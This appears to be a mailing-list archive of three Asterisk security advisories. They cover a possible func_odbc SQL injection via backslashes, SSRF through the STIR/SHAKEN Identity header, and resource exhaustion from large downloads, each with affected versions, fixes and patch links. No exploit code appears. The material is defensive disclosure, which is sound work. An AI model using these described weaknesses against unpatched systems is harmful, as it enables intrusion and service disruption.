Asterisk Project Security Advisory - AST-2022-003 Product Asterisk Summary func_odbc: Possible SQL Injection Nature of Advisory SQL injection Susceptibility Remote unauthenticated sessions SeverityLow Exploits Known No Reported On January 5, 2022 Reported By Leandro Dardini Posted OnApril 14, 2022 Last Updated On April 12, 2022 Advisory ContactJcolp AT sangoma DOT com CVE NameCVE-2022-26651 Description Some databases can use backslashes to escape certain characters, such as backticks. If input is provided to func_odbc which includes backslashes it is possible for func_odbc to construct a broken SQL query and the SQL query to fail. Additionally while it has not yet been reproduced this security advisory is also being published to cover the case of SQL injection with the aim of database manipulation by an outside party. Modules Affected func_odbc Resolution A new dialplan function, SQL_ESC_BACKSLASHES, has been added to the func_odbc module which will escape backslashes. If your usage of func_odbc may have input which includes backslashes and your database uses backslashes to escape backticks then use the dialplan function to escape the backslashes. A second option is to disable support for backslashes for escaping in your database if the underlying database supports it. Affected Versions Product Release Series Asterisk Open Source 16.x All versions Asterisk Open Source 18.x All versions Asterisk Open Source 19.x All versions Certified Asterisk 16.x All versions Corrected In Product Release Asterisk Open Source 16.25.2, 18.11.2, 19.3.2 Certified Asterisk 16.8-cert14 Patches Patch URL Revision https://downloads.digium.com/pub/security/AST-2022-003-16.diff Asterisk 16 https://downloads.digium.com/pub/security/AST-2022-003-18.diff Asterisk 18 https://downloads.digium.com/pub/security/AST-2022-003-19.diff Asterisk 19 https://downloads.digium.com/pub/security/AST-2022-003-16.8.diff Certified Asterisk 16.8 Links https://issues.asterisk.org/jira/browse/ASTERISK-29838 https://downloads.asterisk.org/pub/security/AST-2022-003.html Asterisk Project Security Advisories are posted at http://www.asterisk.org/security This document may be superseded by later versions; if so, the latest version will be posted at https://downloads.digium.com/pub/security/AST-2022-003.pdf and
[FD] AST-2022-002: res_stir_shaken: SSRF vulnerability with Identity header
Asterisk Project Security Advisory - AST-2022-002 ProductAsterisk Summaryres_stir_shaken: SSRF vulnerability with Identity header Nature of Advisory Server-side request forgery SusceptibilityRemote unauthenticated access Severity Major Exploits KnownNo Reported On Jun 10, 2021 Reported By Clint Ruoho Posted On Apr 14, 2022 Last Updated OnApril 13, 2022 Advisory Contact bford AT sangoma DOT com CVE Name CVE-2022-26499 Description When using STIR/SHAKEN, itâs possible to send arbitrary requests like GET to interfaces such as localhost using the Identity header. Modules Affected res_stir_shaken Resolution If you are using STIR/SHAKEN in Asterisk, upgrade to one of the versions listed below to get a new configuration option: stir_shaken_profile. This can be configured in stir_shaken.conf and set on a per endpoint basis in pjsip.conf. This option will take priority over the stir_shaken option. The stir_shaken_profile will contain the stir_shaken option (attest, verify, or both), as well as ACL configuration options to permit and deny specific IP addresses / hosts. The ACL will be used for the public key URL we receive in the Identity header, which is used to tell Asterisk where to download the public certificate. An ACL from acl.conf can be used, but you can specify your own permit and deny lines within the profile itself. A combination of both can also be used. Note that this patch contains changes that affect the same area as the patch from AST-2022-001. It is recommended that you upgrade to a listed version, otherwise you might encounter merge conflicts. Affected Versions Product Release Series Asterisk Open Source16.x 16.15.0 and after Asterisk Open Source18.x All versions Asterisk Open Source19.x All versions Corrected In Product Release Asterisk Open Source 16.25.2, 18.11.2, 19.3.2 Patches Patch URL Revision https://downloads.digium.com/pub/security/AST-2022-002-16.diff Asterisk 16 https://downloads.digium.com/pub/security/AST-2022-002-18.diff Asterisk 18 https://downloads.digium.com/pub/security/AST-2022-002-19.diff Asterisk 19 Links https://issues.asterisk.org/jira/browse/ASTERISK-29476 https://downloads.asterisk.org/pub/security/AST-2022-002.html Asterisk Project Security Advisories are posted at http://www.asterisk.org/security This document may be superseded by later versions; if so, the latest version will be posted at https://downloads.digium.com/pub/security/AST-2022-002.pdf and https://downloads.digium.com/pub/security/AST-2022-002.html Revision History Date Editor Revisions Made
[FD] AST-2022-001: res_stir_shaken: resource exhaustion with large files
Asterisk Project Security Advisory - AST-2022-001 ProductAsterisk Summaryres_stir_shaken: resource exhaustion with large files Nature of Advisory Resource exhaustion SusceptibilityRemote unauthenticated access Severity Major Exploits KnownNo Reported On Jan 21, 2022 Reported By Ben Ford Posted On Apr 14, 2022 Last Updated OnApril 13, 2022 Advisory Contact bford AT sangoma DOT com CVE Name CVE-2022-26498 Description When using STIR/SHAKEN, itâs possible to download files that are not certificates. These files could be much larger than what you would expect to download. Modules Affected res_stir_shaken Resolution If you are using STIR/SHAKEN in Asterisk, upgrade to one of the versions listed below. Asterisk now checks the downloaded file to see if itâs actually a certificate or if it is larger than what is expected. If not upgrading, the curl_timeout option in stir_shaken.conf should be utilized so that downloads do not last an extended period of time. Affected Versions Product Release Series Asterisk Open Source16.x 16.15.0 and after Asterisk Open Source18.x All versions Asterisk Open Source19.x All versions Corrected In Product Release Asterisk Open Source 16.25.2, 18.11.2, 19.3.2 Patches Patch URL Revision https://downloads.digium.com/pub/security/AST-2022-001-16.diff Asterisk 16 https://downloads.digium.com/pub/security/AST-2022-001-18.diff Asterisk 18 https://downloads.digium.com/pub/security/AST-2022-001-19.diff Asterisk 19 Links https://issues.asterisk.org/jira/browse/ASTERISK-29872 https://downloads.asterisk.org/pub/security/AST-2022-001.html Asterisk Project Security Advisories are posted at http://www.asterisk.org/security This document may be superseded by later versions; if so, the latest version will be posted at https://downloads.digium.com/pub/security/AST-2022-001.pdf and https://downloads.digium.com/pub/security/AST-2022-001.html Revision History Date Editor Revisions Made Apr 13, 2022 Ben FordInitial revision Asterisk Project Security Advisory - AST-2022-001 Copyright © 01/19/2022 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/